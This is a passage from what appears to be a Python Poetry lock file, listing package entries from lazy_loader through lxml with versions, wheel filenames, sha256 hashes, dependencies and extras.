"lazy_loader-0.3.tar.gz", hash = "sha256:3b68898e34f5b2a29daaaac172c6555512d0f32074f147e2254e4a6d9d838f37"}, ] [package.extras] lint = ["pre-commit (>=3.3)"] test = ["pytest (>=7.4)", "pytest-cov (>=4.1)"] [[package]] name = "libclang" version = "16.0.6" description = "Clang Python Bindings, mirrored from the official LLVM repo: https://github.com/llvm/llvm-project/tree/main/clang/bindings/python, to make the installation process easier." optional = true python-versions = "*" files = [ {file = "libclang-16.0.6-1-py2.py3-none-manylinux2014_aarch64.whl", hash = "sha256:88bc7e7b393c32e41e03ba77ef02fdd647da1f764c2cd028e69e0837080b79f6"}, {file = "libclang-16.0.6-1-py2.py3-none-manylinux2014_armv7l.whl", hash = "sha256:d80ed5827736ed5ec2bcedf536720476fd9d4fa4c79ef0cb24aea4c59332f361"}, {file = "libclang-16.0.6-py2.py3-none-macosx_10_9_x86_64.whl", hash = "sha256:da9e47ebc3f0a6d90fb169ef25f9fbcd29b4a4ef97a8b0e3e3a17800af1423f4"}, {file = "libclang-16.0.6-py2.py3-none-macosx_11_0_arm64.whl", hash = "sha256:e1a5ad1e895e5443e205568c85c04b4608e4e973dae42f4dfd9cb46c81d1486b"}, {file = "libclang-16.0.6-py2.py3-none-manylinux2010_x86_64.whl", hash = "sha256:9dcdc730939788b8b69ffd6d5d75fe5366e3ee007f1e36a99799ec0b0c001492"}, {file = "libclang-16.0.6-py2.py3-none-manylinux2014_aarch64.whl", hash = "sha256:8130482120500476a027171f8f3c8dfc2536b591716eea71fc5da22cae13131b"}, {file = "libclang-16.0.6-py2.py3-none-manylinux2014_armv7l.whl", hash = "sha256:1e940048f51d0b0999099a9b78629ab8a64b62af5e9ff1b2b062439c21ee244d"}, {file = "libclang-16.0.6-py2.py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:f04e3060ae1f207f234d0608900c99c50edcb743e5e18276d78da2ddd727d39f"}, {file = "libclang-16.0.6-py2.py3-none-win_amd64.whl", hash = "sha256:daab4a11dae228f1efa9efa3fe638b493b14d8d52c71fb3c7019e2f1df4514c2"}, {file = "libclang-16.0.6-py2.py3-none-win_arm64.whl", hash = "sha256:4a9acbfd9c135a72f80d5dbff7588dfb0c81458244a89b9e83526e8595880e0a"}, {file = "libclang-16.0.6.tar.gz", hash = "sha256:4acdde39dfe410c877b4ccc0d4b57eb952100e4ee26bbdf6cfdb88e2033a7d31"}, ] [[package]] name = "libdeeplake" version = "0.0.84" description = "C++ backend for Deep Lake" optional = true python-versions = "*" files = [ {file = "libdeeplake-0.0.84-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:b24e7d025ce29b0e1505c8b952f2e7eda454461fefc9bad61ddc804d1b081c80"}, {file = "libdeeplake-0.0.84-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:dc120ec1cb4fe3f49bfbf02e0a5e8e15129329083ab74f1d618cfe71867eeb61"}, {file = "libdeeplake-0.0.84-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:d94c419063d6e96c4defc5fcdce2a9e143a668bb9292105a2abb8040fbef519e"}, {file = "libdeeplake-0.0.84-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:65e6eab3b1920acef9fbfd5ecb11c4521c38e66bff0b3f02a0760c7d5722e242"}, {file = "libdeeplake-0.0.84-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:3a3a2acf2deef3a72bcde1856a025b13bd594267e84ada91bc79a8881606f29a"}, {file = "libdeeplake-0.0.84-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:69cea8d6d5e736a1a655c191d9192d47c93543f68fc08703a3660b327b2ea8af"}, {file = "libdeeplake-0.0.84-cp311-cp311-manylinux2014_aarch64.whl", hash = "sha256:d4be0dc25d01d07fb3e3cb61d8ff287520fa21f7eeb5190cb8ac38bc32e24a13"}, {file = "libdeeplake-0.0.84-cp311-cp311-manylinux2014_x86_64.whl", hash = "sha256:74798f43084827025e783cedee6e480699cf8c00b89730fc98d39fae8a48bba7"}, {file = "libdeeplake-0.0.84-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:6b9b489254ae2ed18a59eb3ebb9b0229dbd68dfbff695ed61a8b7707cbeae188"}, {file = "libdeeplake-0.0.84-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:f6dfd25181d80fedcb57f93a3e14ba15918b19e30e6758c8868ec452ec4c3d31"}, {file = "libdeeplake-0.0.84-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:bb2f2a0b9c292b342e33e87c9f08f8eed8bc4c0a1b2d16d44a48fc1553a77860"}, {file = "libdeeplake-0.0.84-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:c61696a92b0e07c2ecec5faebb5f78a3f1aae54b12bd84ca553a2d8b9dfdc539"}, {file = "libdeeplake-0.0.84-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:7983b44e2efb541ecaa0960abe2f15eabf1f2567ff2b6c6042b261c5b3399a65"}, {file = "libdeeplake-0.0.84-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:6cd70f8955dd63247cbc56cf7128d948184a0ebf080b46476142bc701a1fc090"}, {file = "libdeeplake-0.0.84-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:553a22bc3c887fdfa5a73a049f72594170e3e0098c0801f7112e64861f25faf2"}, {file = "libdeeplake-0.0.84-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f5b8bc4243c26132bfc87c5dec9c64d42bb9e330a0055a2d8c965daaa0b19927"}, {file = "libdeeplake-0.0.84-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:8bded8b6b3d9055bcb21ba34a2dc8384d84ba61042f8f030ab765f93709029ae"}, {file = "libdeeplake-0.0.84-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:301dab8e7894bc02431173a4d084271a1e451758f3e99b7029d48b5333c0d849"}, ] [package.dependencies] dill = "*" numpy = "*" [[package]] name = "librosa" version = "0.10.1" description = "Python module for audio and music processing" optional = true python-versions = ">=3.7" files = [ {file = "librosa-0.10.1-py3-none-any.whl", hash = "sha256:7ab91d9f5fcb75ea14848a05d3b1f825cf8d0c42ca160d19ae6874f2de2d8223"}, {file = "librosa-0.10.1.tar.gz", hash = "sha256:832f7d150d6dd08ed2aa08c0567a4be58330635c32ddd2208de9bc91300802c7"}, ] [package.dependencies] audioread = ">=2.1.9" decorator = ">=4.3.0" joblib = ">=0.14" lazy-loader = ">=0.1" msgpack = ">=1.0" numba = ">=0.51.0" numpy = ">=1.20.3,<1.22.0 || >1.22.0,<1.22.1 || >1.22.1,<1.22.2 || >1.22.2" pooch = ">=1.0" scikit-learn = ">=0.20.0" scipy = ">=1.2.0" soundfile = ">=0.12.1" soxr = ">=0.3.2" typing-extensions = ">=4.1.1" [package.extras] display = ["matplotlib (>=3.3.0)"] docs = ["ipython (>=7.0)", "matplotlib (>=3.3.0)", "mir-eval (>=0.5)", "numba (>=0.51)", "numpydoc", "presets", "sphinx (!=1.3.1)", "sphinx-gallery (>=0.7)", "sphinx-multiversion (>=0.2.3)", "sphinx-rtd-theme (>=1.2.0)", "sphinxcontrib-svg2pdfconverter"] tests = ["matplotlib (>=3.3.0)", "packaging (>=20.0)", "pytest", "pytest-cov", "pytest-mpl", "resampy (>=0.2.2)", "samplerate", "types-decorator"] [[package]] name = "llvmlite" version = "0.41.1" description = "lightweight wrapper around basic LLVM functionality" optional = true python-versions = ">=3.8" files = [ {file = "llvmlite-0.41.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c1e1029d47ee66d3a0c4d6088641882f75b93db82bd0e6178f7bd744ebce42b9"}, {file = "llvmlite-0.41.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:150d0bc275a8ac664a705135e639178883293cf08c1a38de3bbaa2f693a0a867"}, {file = "llvmlite-0.41.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1eee5cf17ec2b4198b509272cf300ee6577229d237c98cc6e63861b08463ddc6"}, {file = "llvmlite-0.41.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0dd0338da625346538f1173a17cabf21d1e315cf387ca21b294ff209d176e244"}, {file = "llvmlite-0.41.1-cp310-cp310-win32.whl", hash = "sha256:fa1469901a2e100c17eb8fe2678e34bd4255a3576d1a543421356e9c14d6e2ae"}, {file = "llvmlite-0.41.1-cp310-cp310-win_amd64.whl", hash = "sha256:2b76acee82ea0e9304be6be9d4b3840208d050ea0dcad75b1635fa06e949a0ae"}, {file = "llvmlite-0.41.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:210e458723436b2469d61b54b453474e09e12a94453c97ea3fbb0742ba5a83d8"}, {file = "llvmlite-0.41.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:855f280e781d49e0640aef4c4af586831ade8f1a6c4df483fb901cbe1a48d127"}, {file = "llvmlite-0.41.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b67340c62c93a11fae482910dc29163a50dff3dfa88bc874872d28ee604a83be"}, {file = "llvmlite-0.41.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2181bb63ef3c607e6403813421b46982c3ac6bfc1f11fa16a13eaafb46f578e6"}, {file = "llvmlite-0.41.1-cp311-cp311-win_amd64.whl", hash = "sha256:9564c19b31a0434f01d2025b06b44c7ed422f51e719ab5d24ff03b7560066c9a"}, {file = "llvmlite-0.41.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5940bc901fb0325970415dbede82c0b7f3e35c2d5fd1d5e0047134c2c46b3281"}, {file = "llvmlite-0.41.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8b0a9a47c28f67a269bb62f6256e63cef28d3c5f13cbae4fab587c3ad506778b"}, {file = "llvmlite-0.41.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f8afdfa6da33f0b4226af8e64cfc2b28986e005528fbf944d0a24a72acfc9432"}, {file = "llvmlite-0.41.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8454c1133ef701e8c050a59edd85d238ee18bb9a0eb95faf2fca8b909ee3c89a"}, {file = "llvmlite-0.41.1-cp38-cp38-win32.whl", hash = "sha256:2d92c51e6e9394d503033ffe3292f5bef1566ab73029ec853861f60ad5c925d0"}, {file = "llvmlite-0.41.1-cp38-cp38-win_amd64.whl", hash = "sha256:df75594e5a4702b032684d5481db3af990b69c249ccb1d32687b8501f0689432"}, {file = "llvmlite-0.41.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:04725975e5b2af416d685ea0769f4ecc33f97be541e301054c9f741003085802"}, {file = "llvmlite-0.41.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:bf14aa0eb22b58c231243dccf7e7f42f7beec48970f2549b3a6acc737d1a4ba4"}, {file = "llvmlite-0.41.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:92c32356f669e036eb01016e883b22add883c60739bc1ebee3a1cc0249a50828"}, {file = "llvmlite-0.41.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:24091a6b31242bcdd56ae2dbea40007f462260bc9bdf947953acc39dffd54f8f"}, {file = "llvmlite-0.41.1-cp39-cp39-win32.whl", hash = "sha256:880cb57ca49e862e1cd077104375b9d1dfdc0622596dfa22105f470d7bacb309"}, {file = "llvmlite-0.41.1-cp39-cp39-win_amd64.whl", hash = "sha256:92f093986ab92e71c9ffe334c002f96defc7986efda18397d0f08534f3ebdc4d"}, {file = "llvmlite-0.41.1.tar.gz", hash = "sha256:f19f767a018e6ec89608e1f6b13348fa2fcde657151137cb64e56d48598a92db"}, ] [[package]] name = "loguru" version = "0.7.2" description = "Python logging made (stupidly) simple" optional = true python-versions = ">=3.5" files = [ {file = "loguru-0.7.2-py3-none-any.whl", hash = "sha256:003d71e3d3ed35f0f8984898359d65b79e5b21943f78af86aa5491210429b8eb"}, {file = "loguru-0.7.2.tar.gz", hash = "sha256:e671a53522515f34fd406340ee968cb9ecafbc4b36c679da03c18fd8d0bd51ac"}, ] [package.dependencies] colorama = {version = ">=0.3.4", markers = "sys_platform == \"win32\""} win32-setctime = {version = ">=1.0.0", markers = "sys_platform == \"win32\""} [package.extras] dev = ["Sphinx (==7.2.5)", "colorama (==0.4.5)", "colorama (==0.4.6)", "exceptiongroup (==1.1.3)", "freezegun (==1.1.0)", "freezegun (==1.2.2)", "mypy (==v0.910)", "mypy (==v0.971)", "mypy (==v1.4.1)", "mypy (==v1.5.1)", "pre-commit (==3.4.0)", "pytest (==6.1.2)", "pytest (==7.4.0)", "pytest-cov (==2.12.1)", "pytest-cov (==4.1.0)", "pytest-mypy-plugins (==1.9.3)", "pytest-mypy-plugins (==3.0.0)", "sphinx-autobuild (==2021.3.14)", "sphinx-rtd-theme (==1.3.0)", "tox (==3.27.1)", "tox (==4.11.0)"] [[package]] name = "lxml" version = "4.9.3" description = "Powerful and Pythonic XML processing library combining libxml2/libxslt with the ElementTree API." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, != 3.4.*" files = [ {file = "lxml-4.9.3-cp27-cp27m-macosx_11_0_x86_64.whl", hash = "sha256:b0a545b46b526d418eb91754565ba5b63b1c0b12f9bd2f808c852d9b4b2f9b5c"}, {file = "lxml-4.9.3-cp27-cp27m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:075b731ddd9e7f68ad24c635374211376aa05a281673ede86cbe1d1b3455279d"}, {file = "lxml-4.9.3-cp27-cp27m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:1e224d5755dba2f4a9498e150c43792392ac9b5380aa1b845f98a1618c94eeef"}, {file = "lxml-4.9.3-cp27-cp27m-win32.whl", hash = "sha256:2c74524e179f2ad6d2a4f7caf70e2d96639c0954c943ad601a9e146c76408ed7"}, {file = "lxml-4.9.3-cp27-cp27m-win_amd64.whl", hash = "sha256:4f1026bc732b6a7f96369f7bfe1a4f2290fb34dce00d8644bc3036fb351a4ca1"}, {file = "lxml-4.9.3-cp27-cp27mu-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c0781a98ff5e6586926293e59480b64ddd46282953203c76ae15dbbbf302e8bb"}, {file = "lxml-4.9.3-cp27-cp27mu-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cef2502e7e8a96fe5ad686d60b49e1ab03e438bd9123987994528febd569868e"}, {file = "lxml-4.9.3-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:b86164d2cff4d3aaa1f04a14685cbc072efd0b4f99ca5708b2ad1b9b5988a991"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:42871176e7896d5d45138f6d28751053c711ed4d48d8e30b498da155af39aebd"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:ae8b9c6deb1e634ba4f1930eb67ef6e6bf6a44b6eb5ad605642b2d6d5ed9ce3c"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:411007c0d88188d9f621b11d252cce90c4a2d1a49db6c068e3c16422f306eab8"}, {file = "lxml-4.9.3-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:cd47b4a0d41d2afa3e58e5bf1f62069255aa2fd6ff5ee41604418ca925911d76"}, {file = "lxml-4.9.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0e2cb47860da1f7e9a5256254b74ae331687b9672dfa780eed355c4c9c3dbd23"}, {file = "lxml-4.9.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:1247694b26342a7bf47c02e513d32225ededd18045264d40758abeb3c838a51f"}, {file = "lxml-4.9.3-cp310-cp310-win32.whl", hash = "sha256:cdb650fc86227eba20de1a29d4b2c1bfe139dc75a0669270033cb2ea3d391b85"}, {file = "lxml-4.9.3-cp310-cp310-win_amd64.whl", hash = "sha256:97047f0d25cd4bcae81f9ec9dc290ca3e15927c192df17331b53bebe0e3ff96d"}, {file = "lxml-4.9.3-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:1f447ea5429b54f9582d4b955f5f1985f278ce5cf169f72eea8afd9502973dd5"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:57d6ba0ca2b0c462f339640d22882acc711de224d769edf29962b09f77129cbf"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:9767e79108424fb6c3edf8f81e6730666a50feb01a328f4a016464a5893f835a"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:71c52db65e4b56b8ddc5bb89fb2e66c558ed9d1a74a45ceb7dcb20c191c3df2f"}, {file = "lxml-4.9.3-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:d73d8ecf8ecf10a3bd007f2192725a34bd62898e8da27eb9d32a58084f93962b"}, {file = "lxml-4.9.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0a3d3487f07c1d7f150894c238299934a2a074ef590b583103a45002035be120"}, {file = "lxml-4.9.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:9e28c51fa0ce5674be9f560c6761c1b441631901993f76700b1b30ca6c8378d6"}, {file = "lxml-4.9.3-cp311-cp311-win32.whl", hash = "sha256:0bfd0767c5c1de2551a120673b72e5d4b628737cb05414f03c3277bf9bed3305"}, {file = "lxml-4.9.3-cp311-cp311-win_amd64.whl", hash = "sha256:25f32acefac14ef7bd53e4218fe93b804ef6f6b92ffdb4322bb6d49d94cad2bc"}, {file = "lxml-4.9.3-cp312-cp312-macosx_11_0_universal2.whl", hash = "sha256:d3ff32724f98fbbbfa9f49d82852b159e9784d6094983d9a8b7f2ddaebb063d4"}, {file = "lxml-4.9.3-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:48d6ed886b343d11493129e019da91d4039826794a3e3027321c56d9e71505be"}, {file = "lxml-4.9.3-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:9a92d3faef50658dd2c5470af249985782bf754c4e18e15afb67d3ab06233f13"}, {file = "lxml-4.9.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:b4e4bc18382088514ebde9328da057775055940a1f2e18f6ad2d78aa0f3ec5b9"}, {file = "lxml-4.9.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:fc9b106a1bf918db68619fdcd6d5ad4f972fdd19c01d19bdb6bf63f3589a9ec5"}, {file = "lxml-4.9.3-cp312-cp312-win_amd64.whl", hash = "sha256:d37017287a7adb6ab77e1c5bee9bcf9660f90ff445042b790402a654d2ad81d8"}, {file = "lxml-4.9.3-cp35-cp35m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:56dc1f1ebccc656d1b3ed288f11e27172a01503fc016bcabdcbc0978b19352b7"}, {file = "lxml-4.9.3-cp35-cp35m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:578695735c5a3f51569810dfebd05dd6f888147a34f0f98d4bb27e92b76e05c2"}, {file = "lxml-4.9.3-cp35-cp35m-win32.whl", hash = "sha256:704f61ba8c1283c71b16135caf697557f5ecf3e74d9e453233e4771d68a1f42d"}, {file = "lxml-4.9.3-cp35-cp35m-win_amd64.whl", hash = "sha256:c41bfca0bd3532d53d16fd34d20806d5c2b1ace22a2f2e4c0008570bf2c58833"}, {file = "lxml-4.9.3-cp36-cp36m-macosx_11_0_x86_64.whl", hash = "sha256:64f479d719dc9f4c813ad9bb6b28f8390360660b73b2e4beb4cb0ae7104f1c12"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:dd708cf4ee4408cf46a48b108fb9427bfa00b9b85812a9262b5c668af2533ea5"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5c31c7462abdf8f2ac0577d9f05279727e698f97ecbb02f17939ea99ae8daa98"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:e3cd95e10c2610c360154afdc2f1480aea394f4a4f1ea0a5eacce49640c9b190"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_28_x86_64.whl", hash = "sha256:4930be26af26ac545c3dffb662521d4e6268352866956672231887d18f0eaab2"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4aec80cde9197340bc353d2768e2a75f5f60bacda2bab72ab1dc499589b3878c"}, {file = "lxml-4.9.3-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:14e019fd83b831b2e61baed40cab76222139926b1fb5ed0e79225bc0cae14584"}, {file = "lxml-4.9.3-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:0c0850c8b02c298d3c7006b23e98249515ac57430e16a166873fc47a5d549287"}, {file = "lxml-4.9.3-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:aca086dc5f9ef98c512bac8efea4483eb84abbf926eaeedf7b91479feb092458"}, {file = "lxml-4.9.3-cp36-cp36m-win32.whl", hash = "sha256:50baa9c1c47efcaef189f31e3d00d697c6d4afda5c3cde0302d063492ff9b477"}, {file = "lxml-4.9.3-cp36-cp36m-win_amd64.whl", hash = "sha256:bef4e656f7d98aaa3486d2627e7d2df1157d7e88e7efd43a65aa5dd4714916cf"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:46f409a2d60f634fe550f7133ed30ad5321ae2e6630f13657fb9479506b00601"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:4c28a9144688aef80d6ea666c809b4b0e50010a2aca784c97f5e6bf143d9f129"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:141f1d1a9b663c679dc524af3ea1773e618907e96075262726c7612c02b149a4"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_28_x86_64.whl", hash = "sha256:53ace1c1fd5a74ef662f844a0413446c0629d151055340e9893da958a374f70d"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:17a753023436a18e27dd7769e798ce302963c236bc4114ceee5b25c18c52c693"}, {file = "lxml-4.9.3-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:7d298a1bd60c067ea75d9f684f5f3992c9d6766fadbc0bcedd39750bf344c2f4"}, {file = "lxml-4.9.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:081d32421db5df44c41b7f08a334a090a545c54ba977e47fd7cc2deece78809a"}, {file = "lxml-4.9.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:23eed6d7b1a3336ad92d8e39d4bfe09073c31bfe502f20ca5116b2a334f8ec02"}, {file = "lxml-4.9.3-cp37-cp37m-win32.whl", hash = "sha256:1509dd12b773c02acd154582088820893109f6ca27ef7291b003d0e81666109f"}, {file = "lxml-4.9.3-cp37-cp37m-win_amd64.whl", hash = "sha256:120fa9349a24c7043854c53cae8cec227e1f79195a7493e09e0c12e29f918e52"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:4d2d1edbca80b510443f51afd8496be95529db04a509bc8faee49c7b0fb6d2cc"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:8d7e43bd40f65f7d97ad8ef5c9b1778943d02f04febef12def25f7583d19baac"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:71d66ee82e7417828af6ecd7db817913cb0cf9d4e61aa0ac1fde0583d84358db"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:6fc3c450eaa0b56f815c7b62f2b7fba7266c4779adcf1cece9e6deb1de7305ce"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:65299ea57d82fb91c7f019300d24050c4ddeb7c5a190e076b5f48a2b43d19c42"}, {file = "lxml-4.9.3-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:eadfbbbfb41b44034a4c757fd5d70baccd43296fb894dba0295606a7cf3124aa"}, {file = "lxml-4.9.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3e9bdd30efde2b9ccfa9cb5768ba04fe71b018a25ea093379c857c9dad262c40"}, {file = "lxml-4.9.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fcdd00edfd0a3001e0181eab3e63bd5c74ad3e67152c84f93f13769a40e073a7"}, {file = "lxml-4.9.3-cp38-cp38-win32.whl", hash = "sha256:57aba1bbdf450b726d58b2aea5fe47c7875f5afb2c4a23784ed78f19a0462574"}, {file = "lxml-4.9.3-cp38-cp38-win_amd64.whl", hash = "sha256:92af161ecbdb2883c4593d5ed4815ea71b31fafd7fd05789b23100d081ecac96"}, {file = "lxml-4.9.3-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:9bb6ad405121241e99a86efff22d3ef469024ce22875a7ae045896ad23ba2340"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:8ed74706b26ad100433da4b9d807eae371efaa266ffc3e9191ea436087a9d6a7"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:fbf521479bcac1e25a663df882c46a641a9bff6b56dc8b0fafaebd2f66fb231b"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:303bf1edce6ced16bf67a18a1cf8339d0db79577eec5d9a6d4a80f0fb10aa2da"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:5515edd2a6d1a5a70bfcdee23b42ec33425e405c5b351478ab7dc9347228f96e"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:690dafd0b187ed38583a648076865d8c229661ed20e48f2335d68e2cf7dc829d"}, {file = "lxml-4.9.3-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:b6420a005548ad52154c8ceab4a1290ff78d757f9e5cbc68f8c77089acd3c432"}, {file = "lxml-4.9.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:bb3bb49c7a6ad9d981d734ef7c7193bc349ac338776a0360cc671eaee89bcf69"}, {file = "lxml-4.9.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d27be7405547d1f958b60837dc4c1007da90b8b23f54ba1f8b728c78fdb19d50"}, {file = "lxml-4.9.3-cp39-cp39-win32.whl", hash = "sha256:8df133a2ea5e74eef5e8fc6f19b9e085f758768a16e9877a60aec455ed2609b2"}, {file = "lxml-4.9.3-cp39-cp39-win_amd64.whl", hash = "sha256:4dd9a263e845a72eacb60d12401e37c616438ea2e5442885f65082c276dfb2b2"}, {file = "lxml-4.9.3-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:6689a3d7fd13dc687e9102a27e98ef33730ac4fe37795d5036d18b4d527abd35"}, {file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:f6bdac493b949141b733c5345b6ba8f87a226029cbabc7e9e121a413e49441e0"}, {file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:05186a0f1346ae12553d66df1cfce6f251589fea3ad3da4f3ef4e34b2d58c6a3"}, {file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:c2006f5c8d28dee289f7020f721354362fa304acbaaf9745751ac4006650254b"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-macosx_11_0_x86_64.whl", hash = "sha256:5c245b783db29c4e4fbbbfc9c5a78be496c9fea25517f90606aa1f6b2b3d5f7b"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:4fb960a632a49f2f089d522f70496640fdf1218f1243889da3822e0a9f5f3ba7"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:50670615eaf97227d5dc60de2dc99fb134a7130d310d783314e7724bf163f75d"}, {file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:9719fe17307a9e814580af1f5c6e05ca593b12fb7e44fe62450a5384dbf61b4b"}, {file = 